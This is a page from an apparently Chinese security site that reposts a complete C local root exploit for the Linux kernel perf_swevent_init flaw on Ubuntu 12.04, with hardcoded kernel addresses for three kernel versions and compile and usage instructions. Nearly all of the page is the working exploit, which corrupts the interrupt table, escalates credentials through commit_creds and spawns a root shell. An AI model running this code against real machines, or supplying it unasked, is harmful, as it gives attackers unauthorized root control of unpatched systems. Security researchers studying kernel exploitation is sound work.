首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ubuntu 12.04.0-2LTS x64 perf_swevent_init - Kernel Local Root Exploit
来源:vnik5287@gmail.com 作者:Vitaly 发布时间:2014-06-03  
/**
 * Ubuntu 12.04 3.x x86_64 perf_swevent_init Local root exploit
 * by Vitaly Nikolenko (vnik5287@gmail.com)
 
 * based on semtex.c by sd
 *
 * Supported targets:
 * [0] Ubuntu 12.04.0 - 3.2.0-23-generic
 * [1] Ubuntu 12.04.1 - 3.2.0-29-generic
 * [2] Ubuntu 12.04.2 - 3.5.0-23-generic
 *
 * $ gcc vnik.c -O2 -o vnik
 *
 * $ uname -r
 * 3.2.0-23-generic
 *
 * $ ./vnik 0
 */
   
#define _GNU_SOURCE 1
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <syscall.h>
#include <stdint.h>
#include <assert.h>
   
#define BASE  0x1780000000
#define SIZE  0x0010000000
#define KSIZE 0x2000000
#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))
   
typedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred);
  
uint64_t targets[3][3] =
            {{0xffffffff81ef67e0,  // perf_swevent_enabled
              0xffffffff81091630,  // commit_creds
              0xffffffff810918e0}, // prepare_kernel_cred
             {0xffffffff81ef67a0,
              0xffffffff81091220,
              0xffffffff810914d0},
             {0xffffffff81ef5940,
              0xffffffff8107ee30,
              0xffffffff8107f0c0}
        };
  
void __attribute__((regparm(3))) payload() {
    uint32_t *fixptr = (void*)AB(1);
    // restore the handler
    *fixptr = -1;
    commit_creds_fn commit_creds = (commit_creds_fn)AB(2);
    prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)AB(3);
    commit_creds(prepare_kernel_cred((uint64_t)NULL));
}
   
void trigger(uint32_t off) {
    uint64_t buf[10] = { 0x4800000001, off, 0, 0, 0, 0x300 };
    int fd = syscall(298, buf, 0, -1, -1, 0);
    assert( !close(fd) );
}
   
int main(int argc, char **argv) {
    uint64_t off64, needle, kbase, *p;
    uint8_t *code;
    uint32_t int_n, j = 5, target = 1337;
    int offset = 0;
    void *map;
  
    assert(argc == 2 && "target?");
    assert( (target = atoi(argv[1])) < 3 );
  
    struct {
        uint16_t limit;
        uint64_t addr;
    } __attribute__((packed)) idt;
  
    // mmap user-space block so we don't page fault
    // on sw_perf_event_destroy
    assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);
    memset(map, 0, SIZE);
  
    asm volatile("sidt %0" : "=m" (idt));
    kbase = idt.addr & 0xff000000;
    printf("IDT addr = 0x%lx\n", idt.addr);
  
    assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);
    memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &payload, 1024);
    memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf", 13);
  
    // can only play with interrupts 3, 4 and 0x80
    for (int_n = 3; int_n <= 0x80; int_n++) {
        for (off64 = 0x00000000ffffffff; (int)off64 < 0; off64--) {
            int off32 = off64;
      
            if ((targets[target][0] + ((uint64_t)off32)*24) == (idt.addr + int_n*16 + 8)) {
                offset = off32;
                goto out;
            }
        }
        if (int_n == 4) {
            // shit, let's try 0x80 if the kernel is compiled with
            // CONFIG_IA32_EMULATION
            int_n = 0x80 - 1;
        }
    }
out:
    assert(offset);
    printf("Using int = %d with offset = %d\n", int_n, offset);
  
    for (j = 0; j < 3; j++) {
        needle = AB(j+1);
        assert(p = memmem(code, 1024, &needle, 8));
        *p = !j ? (idt.addr + int_n * 16 + 8) : targets[target][j];
    }
    trigger(offset);
    switch (int_n) {
    case 3:
        asm volatile("int $0x03");
        break;
    case 4:
        asm volatile("int $0x04");
        break;
    case 0x80:
        asm volatile("int $0x80");
    }
  
    assert(!setuid(0));
    return execl("/bin/bash", "-sh", NULL);
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ElasticSearch Dynamic Script A
·Easy File Management Web Serve
·Microsoft Internet Explorer 11
·dbus-glib pam_fprintd - Local
·Wireshark CAPWAP Dissector - D
·Google Compute Engine Lateral
·TORQUE Resource Manager 2.5.x-
·Easy File Sharing FTP Server 3
·linux/x86 Netcat Shellcode 58
·Sagem 2604 Password Disclosure
·Core FTP Server Version 1.2, b
·Madness Pro <= 1.14 - Persiste
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved